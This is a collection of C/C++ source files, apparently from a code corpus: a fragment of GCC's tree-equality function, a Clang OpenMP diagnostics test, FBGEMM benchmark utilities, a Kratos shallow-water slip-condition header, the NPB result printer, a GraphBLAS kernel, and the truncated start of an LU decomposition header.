if (t1 == t2)
return true;
if (!t1 || !t2)
return false;
for (code1 = TREE_CODE (t1);
CONVERT_EXPR_CODE_P (code1)
|| code1 == NON_LVALUE_EXPR;
code1 = TREE_CODE (t1))
t1 = TREE_OPERAND (t1, 0);
for (code2 = TREE_CODE (t2);
CONVERT_EXPR_CODE_P (code2)
|| code2 == NON_LVALUE_EXPR;
code2 = TREE_CODE (t2))
t2 = TREE_OPERAND (t2, 0);
/* They might have become equal now. */
if (t1 == t2)
return true;
if (code1 != code2)
return false;
switch (code1)
{
case INTEGER_CST:
return wi::to_wide (t1) == wi::to_wide (t2);
case REAL_CST:
return real_equal (&TREE_REAL_CST (t1), &TREE_REAL_CST (t2));
case STRING_CST:
return TREE_STRING_LENGTH (t1) == TREE_STRING_LENGTH (t2)
&& !memcmp (TREE_STRING_POINTER (t1), TREE_STRING_POINTER (t2),
TREE_STRING_LENGTH (t1));
case FIXED_CST:
return FIXED_VALUES_IDENTICAL (TREE_FIXED_CST (t1),
TREE_FIXED_CST (t2));
case COMPLEX_CST:
return c_tree_equal (TREE_REALPART (t1), TREE_REALPART (t2))
&& c_tree_equal (TREE_IMAGPART (t1), TREE_IMAGPART (t2));
case VECTOR_CST:
return operand_equal_p (t1, t2, OEP_ONLY_CONST);
case CONSTRUCTOR:
/* We need to do this when determining whether or not two
non-type pointer to member function template arguments
are the same. */
if (!comptypes (TREE_TYPE (t1), TREE_TYPE (t2))
|| CONSTRUCTOR_NELTS (t1) != CONSTRUCTOR_NELTS (t2))
return false;
{
tree field, value;
unsigned int i;
FOR_EACH_CONSTRUCTOR_ELT (CONSTRUCTOR_ELTS (t1), i, field, value)
{
constructor_elt *elt2 = CONSTRUCTOR_ELT (t2, i);
if (!c_tree_equal (field, elt2->index)
|| !c_tree_equal (value, elt2->value))
return false;
}
}
return true;
case TREE_LIST:
if (!c_tree_equal (TREE_PURPOSE (t1), TREE_PURPOSE (t2)))
return false;
if (!c_tree_equal (TREE_VALUE (t1), TREE_VALUE (t2)))
return false;
return c_tree_equal (TREE_CHAIN (t1), TREE_CHAIN (t2));
case SAVE_EXPR:
return c_tree_equal (TREE_OPERAND (t1, 0), TREE_OPERAND (t2, 0));
case CALL_EXPR:
{
tree arg1, arg2;
call_expr_arg_iterator iter1, iter2;
if (!c_tree_equal (CALL_EXPR_FN (t1), CALL_EXPR_FN (t2)))
return false;
for (arg1 = first_call_expr_arg (t1, &iter1),
arg2 = first_call_expr_arg (t2, &iter2);
arg1 && arg2;
arg1 = next_call_expr_arg (&iter1),
arg2 = next_call_expr_arg (&iter2))
if (!c_tree_equal (arg1, arg2))
return false;
if (arg1 || arg2)
return false;
return true;
}
case TARGET_EXPR:
{
tree o1 = TREE_OPERAND (t1, 0);
tree o2 = TREE_OPERAND (t2, 0);
/* Special case: if either target is an unallocated VAR_DECL,
it means that it's going to be unified with whatever the
TARGET_EXPR is really supposed to initialize, so treat it
as being equivalent to anything. */
if (VAR_P (o1) && DECL_NAME (o1) == NULL_TREE
&& !DECL_RTL_SET_P (o1))
/*Nop*/;
else if (VAR_P (o2) && DECL_NAME (o2) == NULL_TREE
&& !DECL_RTL_SET_P (o2))
/*Nop*/;
else if (!c_tree_equal (o1, o2))
return false;
return c_tree_equal (TREE_OPERAND (t1, 1), TREE_OPERAND (t2, 1));
}
case COMPONENT_REF:
if (TREE_OPERAND (t1, 1) != TREE_OPERAND (t2, 1))
return false;
return c_tree_equal (TREE_OPERAND (t1, 0), TREE_OPERAND (t2, 0));
case PARM_DECL:
case VAR_DECL:
case CONST_DECL:
case FIELD_DECL:
case FUNCTION_DECL:
case IDENTIFIER_NODE:
case SSA_NAME:
return false;
case TREE_VEC:
{
unsigned ix;
if (TREE_VEC_LENGTH (t1) != TREE_VEC_LENGTH (t2))
return false;
for (ix = TREE_VEC_LENGTH (t1); ix--;)
if (!c_tree_equal (TREE_VEC_ELT (t1, ix),
TREE_VEC_ELT (t2, ix)))
return false;
return true;
}
default:
break;
}
switch (TREE_CODE_CLASS (code1))
{
case tcc_unary:
case tcc_binary:
case tcc_comparison:
case tcc_expression:
case tcc_vl_exp:
case tcc_reference:
case tcc_statement:
{
int i, n = TREE_OPERAND_LENGTH (t1);
switch (code1)
{
case PREINCREMENT_EXPR:
case PREDECREMENT_EXPR:
case POSTINCREMENT_EXPR:
case POSTDECREMENT_EXPR:
n = 1;
break;
case ARRAY_REF:
n = 2;
break;
default:
break;
}
if (TREE_CODE_CLASS (code1) == tcc_vl_exp
&& n != TREE_OPERAND_LENGTH (t2))
return false;
for (i = 0; i < n; ++i)
if (!c_tree_equal (TREE_OPERAND (t1, i), TREE_OPERAND (t2, i)))
return false;
return true;
}
case tcc_type:
return comptypes (t1, t2);
default:
gcc_unreachable ();
}
/* We can get here with --disable-checking. */
return false;
}
/* Returns true when the function declaration FNDECL is implicit,
introduced as a result of a call to an otherwise undeclared
function, and false otherwise. */
bool
c_decl_implicit (const_tree fndecl)
{
return C_DECL_IMPLICIT (fndecl);
}
|
parallel_for_misc_messages.c | // RUN: %clang_cc1 -fsyntax-only -fopenmp -verify %s
// expected-error@+1 {{unexpected OpenMP directive '#pragma omp parallel for'}}
#pragma omp parallel for
// expected-error@+1 {{unexpected OpenMP directive '#pragma omp parallel for'}}
#pragma omp parallel for foo
void test_no_clause() {
int i;
#pragma omp parallel for
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{statement after '#pragma omp parallel for' must be a for loop}}
#pragma omp parallel for
++i;
}
void test_branch_protected_scope() {
int i = 0;
L1:
++i;
int x[24];
#pragma omp parallel for
for (i = 0; i < 16; ++i) {
if (i == 5)
goto L1; // expected-error {{use of undeclared label 'L1'}}
else if (i == 6)
return; // expected-error {{cannot return from OpenMP region}}
else if (i == 7)
goto L2;
else if (i == 8) {
L2:
x[i]++;
}
}
if (x[0] == 0)
goto L2; // expected-error {{use of undeclared label 'L2'}}
else if (x[1] == 1)
goto L1;
}
void test_invalid_clause() {
int i;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for foo bar
for (i = 0; i < 16; ++i)
;
}
void test_non_identifiers() {
int i, x;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for;
for (i = 0; i < 16; ++i)
;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for private(x);
for (i = 0; i < 16; ++i)
;
// expected-warning@+1 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
#pragma omp parallel for, private(x);
for (i = 0; i < 16; ++i)
;
}
extern int foo();
void test_collapse() {
int i;
// expected-error@+1 {{expected '('}}
#pragma omp parallel for collapse
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}} expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for collapse(
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for collapse()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}} expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for collapse(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}} expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for collapse(, )
for (i = 0; i < 16; ++i)
;
// expected-warning@+2 {{extra tokens at the end of '#pragma omp parallel for' are ignored}}
// expected-error@+1 {{expected '('}}
#pragma omp parallel for collapse 4)
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4,
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4, )
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4 4)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4, , 4)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
#pragma omp parallel for collapse(4)
for (int i1 = 0; i1 < 16; ++i1)
for (int i2 = 0; i2 < 16; ++i2)
for (int i3 = 0; i3 < 16; ++i3)
for (int i4 = 0; i4 < 16; ++i4)
foo();
// expected-error@+2 {{expected ')'}}
// expected-note@+1 {{to match this '('}} expected-note@+1 {{as specified in 'collapse' clause}}
#pragma omp parallel for collapse(4, 8)
for (i = 0; i < 16; ++i)
; // expected-error {{expected 4 for loops after '#pragma omp parallel for', but found only 1}}
// expected-error@+1 {{expression is not an integer constant expression}}
#pragma omp parallel for collapse(2.5)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expression is not an integer constant expression}}
#pragma omp parallel for collapse(foo())
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{argument to 'collapse' clause must be a strictly positive integer value}}
#pragma omp parallel for collapse(-5)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{argument to 'collapse' clause must be a strictly positive integer value}}
#pragma omp parallel for collapse(0)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{argument to 'collapse' clause must be a strictly positive integer value}}
#pragma omp parallel for collapse(5 - 5)
for (i = 0; i < 16; ++i)
;
// expected-note@+1 {{defined as firstprivate}}
#pragma omp parallel for collapse(2) firstprivate(i)
for (i = 0; i < 16; ++i)
// expected-note@+1 {{variable with automatic storage duration is predetermined as private; perhaps you forget to enclose 'omp for' directive into a parallel or another task region?}}
for (int j = 0; j < 16; ++j)
// expected-error@+2 2 {{reduction variable must be shared}}
// expected-error@+1 {{region cannot be closely nested inside 'parallel for' region; perhaps you forget to enclose 'omp for' directive into a parallel region?}}
#pragma omp for reduction(+ : i, j)
for (int k = 0; k < 16; ++k)
i += j;
}
void test_private() {
int i;
// expected-error@+2 {{expected expression}}
// expected-error@+1 {{expected ')'}} expected-note@+1 {{to match this '('}}
#pragma omp parallel for private(
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for private(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for private(, )
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for private()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for private(int)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected variable name}}
#pragma omp parallel for private(0)
for (i = 0; i < 16; ++i)
;
int x, y, z;
#pragma omp parallel for private(x)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for private(x, y)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for private(x, y, z)
for (i = 0; i < 16; ++i) {
x = y * i + z;
}
}
void test_lastprivate() {
int i;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 {{expected expression}}
#pragma omp parallel for lastprivate(
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for lastprivate(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for lastprivate(, )
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for lastprivate()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for lastprivate(int)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected variable name}}
#pragma omp parallel for lastprivate(0)
for (i = 0; i < 16; ++i)
;
int x, y, z;
#pragma omp parallel for lastprivate(x)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y, z)
for (i = 0; i < 16; ++i)
;
}
void test_firstprivate() {
int i;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 {{expected expression}}
#pragma omp parallel for firstprivate(
for (i = 0; i < 16; ++i)
;
// expected-error@+2 {{expected ')'}} expected-note@+2 {{to match this '('}}
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for firstprivate(,
for (i = 0; i < 16; ++i)
;
// expected-error@+1 2 {{expected expression}}
#pragma omp parallel for firstprivate(, )
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for firstprivate()
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected expression}}
#pragma omp parallel for firstprivate(int)
for (i = 0; i < 16; ++i)
;
// expected-error@+1 {{expected variable name}}
#pragma omp parallel for firstprivate(0)
for (i = 0; i < 16; ++i)
;
int x, y, z;
#pragma omp parallel for lastprivate(x) firstprivate(x)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y) firstprivate(x, y)
for (i = 0; i < 16; ++i)
;
#pragma omp parallel for lastprivate(x, y, z) firstprivate(x, y, z)
for (i = 0; i < 16; ++i)
;
}
void test_loop_messages() {
float a[100], b[100], c[100];
// expected-error@+2 {{variable must be of integer or pointer type}}
#pragma omp parallel for
for (float fi = 0; fi < 10.0; fi++) {
c[(int)fi] = a[(int)fi] + b[(int)fi];
}
// expected-error@+2 {{variable must be of integer or pointer type}}
#pragma omp parallel for
for (double fi = 0; fi < 10.0; fi++) {
c[(int)fi] = a[(int)fi] + b[(int)fi];
}
}
|
BenchUtils.h | /*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#pragma once
#include <chrono>
#include <vector>
#ifdef _OPENMP
#include <omp.h>
#endif
#include "AlignedVec.h"
namespace fbgemm {
template <typename T>
void randFill(aligned_vector<T>& vec, T low, T high);
void llc_flush(std::vector<char>& llc);
int fbgemm_get_num_threads();
int fbgemm_get_thread_num();
/**
* @param fn the function to benchmark
* @param warmupIterations iterations run before timing starts
* @param measuredIterations iterations whose wall time is averaged
* @param llc if not nullptr, flush the last-level cache before each call
* @param useOpenMP if true, run and time fn inside an OpenMP parallel region
*/
template <class Fn>
double measureWithWarmup(
Fn&& fn,
int warmupIterations,
int measuredIterations,
std::vector<char>* llc = nullptr,
bool useOpenMP = false) {
for (int i = 0; i < warmupIterations; ++i) {
if (llc) {
llc_flush(*llc);
}
fn();
}
double ttot = 0.0;
#ifdef _OPENMP
#pragma omp parallel if (useOpenMP)
#endif
for (int i = 0; i < measuredIterations; ++i) {
int thread_id = 0;
std::chrono::time_point<std::chrono::high_resolution_clock> start, end;
#ifdef _OPENMP
if (useOpenMP) {
thread_id = omp_get_thread_num();
}
#endif
if (llc && thread_id == 0) {
llc_flush(*llc);
}
#ifdef _OPENMP
if (useOpenMP) {
#pragma omp barrier
}
#endif
start = std::chrono::high_resolution_clock::now();
fn();
end = std::chrono::high_resolution_clock::now();
auto dur =
std::chrono::duration_cast<std::chrono::nanoseconds>(end - start);
if (thread_id == 0) {
// TODO: measure load imbalance
ttot += dur.count();
}
}
return ttot / 1e9 / measuredIterations;
}
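// Example usage (illustrative only; run_kernel and the buffer size are
// assumptions, not part of this header):
//
//   std::vector<char> llc(128 * 1024 * 1024);  // larger than the LLC
//   double secs = measureWithWarmup(
//       [&] { run_kernel(); },     // hypothetical benchmarked function
//       /*warmupIterations=*/10,
//       /*measuredIterations=*/100,
//       &llc,                      // flush the cache before each timing
//       /*useOpenMP=*/true);       // time inside an omp parallel region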
} // namespace fbgemm
|
flow_rate_slip_utility.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Miguel Maso Sotomayor
//
#ifndef KRATOS_FLOW_RATE_SLIP_UTILITY_H_INCLUDED
#define KRATOS_FLOW_RATE_SLIP_UTILITY_H_INCLUDED
// System includes
// External includes
// Project includes
#include "utilities/coordinate_transformation_utilities.h"
namespace Kratos
{
///@addtogroup ShallowWaterApplication
///@{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/**
* @brief Tools to apply slip conditions
* @details A utility to rotate the local contributions of certain nodes to the system matrix, which is required to apply slip conditions in arbitrary directions.
*/
template<class TLocalMatrixType, class TLocalVectorType, class TValueType>
class FlowRateSlipUtility
: public CoordinateTransformationUtils<TLocalMatrixType,TLocalVectorType,TValueType>
{
public:
///@name Type Definitions
///@{
/// Pointer definition of FlowRateSlipUtility
KRATOS_CLASS_POINTER_DEFINITION(FlowRateSlipUtility);
typedef CoordinateTransformationUtils<TLocalMatrixType,TLocalVectorType,TValueType> BaseType;
typedef std::size_t SizeType;
typedef Node<3> NodeType;
typedef Geometry<NodeType> GeometryType;
///@}
///@name Life Cycle
///@{
/// Default constructor.
FlowRateSlipUtility() : BaseType(2,3,SLIP) {}
/// Destructor.
virtual ~FlowRateSlipUtility() {}
///@}
///@name Operators
///@{
///@}
///@name Operations
///@{
/**
* @brief Apply slip boundary conditions to the rotated local contributions.
* @details This function takes the local system contributions rotated so each
* node's velocities are expressed using a base oriented with its normal
* and imposes that the normal velocity is equal to the mesh velocity in
* the normal direction.
* @param rLocalMatrix A reference to the LHS local matrix
* @param rLocalVector A reference to the RHS local vector
* @param rGeometry A reference to the geometry of the element or condition
*/
virtual void ApplySlipCondition(
TLocalMatrixType& rLocalMatrix,
TLocalVectorType& rLocalVector,
GeometryType& rGeometry) const override
{
const SizeType LocalSize = rLocalVector.size(); // We expect this to work both with elements and conditions
if (LocalSize > 0)
{
for (SizeType it_node = 0; it_node < rGeometry.PointsNumber(); ++it_node)
{
if (this->IsSlip(rGeometry[it_node]))
{
// We fix the first dof (normal velocity) for each rotated block
SizeType j = it_node * BaseType::GetBlockSize();
array_1d<double,3> vel = rGeometry[it_node].FastGetSolutionStepValue(MOMENTUM);
array_1d<double,3> n = rGeometry[it_node].FastGetSolutionStepValue(NORMAL);
this->Normalize(n);
for (SizeType i = 0; i < j; ++i) // Skip term (i,i)
{
rLocalMatrix(i,j) = 0.0;
rLocalMatrix(j,i) = 0.0;
}
for (SizeType i = j+1; i < LocalSize; ++i)
{
rLocalMatrix(i,j) = 0.0;
rLocalMatrix(j,i) = 0.0;
}
rLocalVector(j) = - inner_prod(n, vel);
rLocalMatrix(j,j) = 1.0;
}
}
}
}
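/* Illustrative sketch (not part of the utility): for a shallow-water
block of size 3 whose rotated normal-momentum row is j, the loops above
clear row and column j and pin the diagonal, so the local system becomes

  [ 1 0 0 ] [ dq_n ]   [ -n . q ]
  [ 0 * * ] [ dq_t ] = [   ...  ]
  [ 0 * * ] [  dh  ]   [   ...  ]

i.e. the solved correction is dq_n = -n . q, which (in an incremental
update) drives the normal momentum at the slip node to zero. */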
/**
* @brief RHS only version of ApplySlipCondition
* @param rLocalVector A reference to the RHS local vector
* @param rGeometry A reference to the geometry of the element or condition
*/
virtual void ApplySlipCondition(
TLocalVectorType& rLocalVector,
GeometryType& rGeometry) const override
{
if (rLocalVector.size() > 0)
{
for (SizeType it_node = 0; it_node < rGeometry.PointsNumber(); ++it_node)
{
if (this->IsSlip(rGeometry[it_node]))
{
// We fix the first dof (normal velocity) for each rotated block
SizeType j = it_node * BaseType::GetBlockSize();
array_1d<double,3> vel = rGeometry[it_node].FastGetSolutionStepValue(MOMENTUM);
array_1d<double,3> n = rGeometry[it_node].FastGetSolutionStepValue(NORMAL);
this->Normalize(n);
rLocalVector[j] = inner_prod(n, vel);
}
}
}
}
/**
* @brief Transform nodal velocities to the rotated coordinates (aligned with each node's normal)
* @param rModelPart A reference to the model part
* @see RecoverVelocities
*/
virtual void RotateVelocities(ModelPart& rModelPart) const override
{
TLocalVectorType vel(BaseType::GetDomainSize());
TLocalVectorType tmp(BaseType::GetDomainSize());
ModelPart::NodeIterator it_begin = rModelPart.NodesBegin();
#pragma omp parallel for firstprivate(vel, tmp)
for(int i = 0; i < static_cast<int>(rModelPart.Nodes().size()); ++i)
{
ModelPart::NodeIterator it_node = it_begin + i;
if (this->IsSlip(*it_node))
{
// For shallow water problems, domain size is always 2
BoundedMatrix<double,2,2> rot;
BaseType::LocalRotationOperatorPure(rot, *it_node);
array_1d<double,3>& r_velocity = it_node->FastGetSolutionStepValue(MOMENTUM);
for(SizeType i = 0; i < 2; i++) {
vel[i] = r_velocity[i];
}
noalias(tmp) = prod(rot, vel);
for(SizeType i = 0; i < 2; i++) {
r_velocity[i] = tmp[i];
}
}
}
}
/**
* Transform nodal velocities from the rotated system to the original one
* @param rModelPart A reference to the model part
* @see RotateVelocities
*/
virtual void RecoverVelocities(ModelPart& rModelPart) const override
{
TLocalVectorType vel(BaseType::GetDomainSize());
TLocalVectorType tmp(BaseType::GetDomainSize());
ModelPart::NodeIterator it_begin = rModelPart.NodesBegin();
#pragma omp parallel for firstprivate(vel, tmp)
for(int i = 0; i<static_cast<int>(rModelPart.Nodes().size()); ++i)
{
ModelPart::NodeIterator it_node = it_begin + i;
if( this->IsSlip(*it_node) )
{
// For shallow water problems, domain size is always 2
BoundedMatrix<double,2,2> rot;
BaseType::LocalRotationOperatorPure(rot,*it_node);
array_1d<double,3>& r_velocity = it_node->FastGetSolutionStepValue(MOMENTUM);
for(SizeType i = 0; i < 2; i++) {
vel[i] = r_velocity[i];
}
noalias(tmp) = prod(trans(rot),vel);
for(SizeType i = 0; i < 2; i++) {
r_velocity[i] = tmp[i];
}
}
}
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/**
* Turn back information as a string.
*/
virtual std::string Info() const override
{
std::stringstream buffer;
buffer << "FlowRateSlipUtility";
return buffer.str();
}
/**
* Print information about this object.
*/
virtual void PrintInfo(std::ostream& rOStream) const override
{
rOStream << "FlowRateSlipUtility";
}
///@}
///@name Friends
///@{
///@}
private:
///@name Un accessible methods
///@{
/// Assignment operator.
// FlowRateSlipUtility& operator=(FlowRateSlipUtility const& rOther) {}
/// Copy constructor.
// FlowRateSlipUtility(FlowRateSlipUtility const& rOther) {}
///@}
}; // Class FlowRateSlipUtility
///@}
///@name Type Definitions
///@{
///@}
///@name Input and output
///@{
/// input stream function
template<class TLocalMatrixType, class TLocalVectorType, class TValueType>
inline std::istream& operator >> (
std::istream& rIStream,
FlowRateSlipUtility<TLocalMatrixType, TLocalVectorType,TValueType>& rThis)
{
return rIStream;
}
/// output stream function
template<class TLocalMatrixType, class TLocalVectorType, class TValueType>
inline std::ostream& operator << (
std::ostream& rOStream,
const FlowRateSlipUtility<TLocalMatrixType, TLocalVectorType,TValueType>& rThis)
{
rThis.PrintInfo(rOStream);
rOStream << std::endl;
rThis.PrintData(rOStream);
return rOStream;
}
///@}
///@} addtogroup block
} // namespace Kratos.
#endif // KRATOS_FLOW_RATE_SLIP_UTILITY_H_INCLUDED defined
|
c_print_results.c | /*****************************************************************/
/****** C _ P R I N T _ R E S U L T S ******/
/*****************************************************************/
#include <stdlib.h>
#include <stdio.h>
#ifdef _OPENMP
#include <omp.h>
#endif
void c_print_results( char *name,
char class,
int n1,
int n2,
int n3,
int niter,
double t,
double mops,
char *optype,
int passed_verification,
char *npbversion,
char *compiletime,
char *cc,
char *clink,
char *c_lib,
char *c_inc,
char *cflags,
char *clinkflags )
{
int num_threads, max_threads;
max_threads = 1;
num_threads = 1;
/* figure out number of threads used */
#ifdef _OPENMP
max_threads = omp_get_max_threads();
#pragma omp parallel shared(num_threads)
{
#pragma omp master
num_threads = omp_get_num_threads();
}
#endif
printf( "\n\n %s Benchmark Completed\n", name );
printf( " Class = %c\n", class );
if( n3 == 0 ) {
long nn = n1;
if ( n2 != 0 ) nn *= n2;
printf( " Size = %12ld\n", nn ); /* as in IS */
}
else
printf( " Size = %4dx%4dx%4d\n", n1,n2,n3 );
printf( " Iterations = %12d\n", niter );
printf( " Time in seconds = %12.2f\n", t );
printf( " Total threads = %12d\n", num_threads);
printf( " Avail threads = %12d\n", max_threads);
if (num_threads != max_threads)
printf( " Warning: Threads used differ from threads available\n");
printf( " Mop/s total = %12.2f\n", mops );
printf( " Mop/s/thread = %12.2f\n",
mops/(double)num_threads );
printf( " Operation type = %24s\n", optype);
if( passed_verification < 0 )
printf( " Verification = NOT PERFORMED\n" );
else if( passed_verification )
printf( " Verification = SUCCESSFUL\n" );
else
printf( " Verification = UNSUCCESSFUL\n" );
printf( " Version = %12s\n", npbversion );
printf( " Compile date = %12s\n", compiletime );
printf( "\n Compile options:\n" );
printf( " CC = %s\n", cc );
printf( " CLINK = %s\n", clink );
printf( " C_LIB = %s\n", c_lib );
printf( " C_INC = %s\n", c_inc );
printf( " CFLAGS = %s\n", cflags );
printf( " CLINKFLAGS = %s\n", clinkflags );
printf( "\n\n" );
printf( " Please send all errors/feedbacks to:\n\n" );
printf( " NPB Development Team\n" );
printf( " npb@nas.nasa.gov\n\n" );
/* printf( " Please send the results of this run to:\n\n" );
printf( " NPB Development Team\n" );
printf( " Internet: npb@nas.nasa.gov\n \n" );
printf( " If email is not available, send this to:\n\n" );
printf( " MS T27A-1\n" );
printf( " NASA Ames Research Center\n" );
printf( " Moffett Field, CA 94035-1000\n\n" );
printf( " Fax: 650-604-3957\n\n" ); */
}
|
GB_unaryop__abs_fp32_bool.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__abs_fp32_bool
// op(A') function: GB_tran__abs_fp32_bool
// C type: float
// A type: bool
// cast: float cij = (float) aij
// unaryop: cij = fabsf (aij)
#define GB_ATYPE \
bool
#define GB_CTYPE \
float
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
bool aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = fabsf (x) ;
// casting
#define GB_CASTING(z, x) \
float z = (float) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
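// Illustrative expansion of GB_CAST_OP (pC, pA) given the macros above:
//      bool aij = Ax [pA] ;
//      float x = (float) aij ;
//      Cx [pC] = fabsf (x) ;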
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ABS || GxB_NO_FP32 || GxB_NO_BOOL)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__abs_fp32_bool
(
float *restrict Cx,
const bool *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__abs_fp32_bool
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t **Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
lu_decomposition.h | /**
* @file lu_decomposition.h
* @author [Krishna Vedala](https://github.com/kvedala)
* @brief Functions associated with [LU
* Decomposition](https://en.wikipedia.org/wiki/LU_decomposition)
* of a square matrix.
*/
#pragma once
#include <iostream>
#include <valarray>
#include <vector>
#ifdef _OPENMP
#include <omp.h>
#endif
/** Define matrix type as a `std::vector` of `std::valarray` */
template <typename T>
using matrix = std::vector<std::valarray<T>>;
/** Perform LU decomposition on matrix
* \param[in] A matrix to decompose
* \param[out] L output L matrix
* \param[out] U output U matrix
* \returns 0 if no errors
* \returns negative if error occurred
*/
template <typename T>
int lu_decomposition(const matrix<T> &A, matrix<double> *L, matrix<double> *U)
{
    int mat_size = static_cast<int>(A.size());
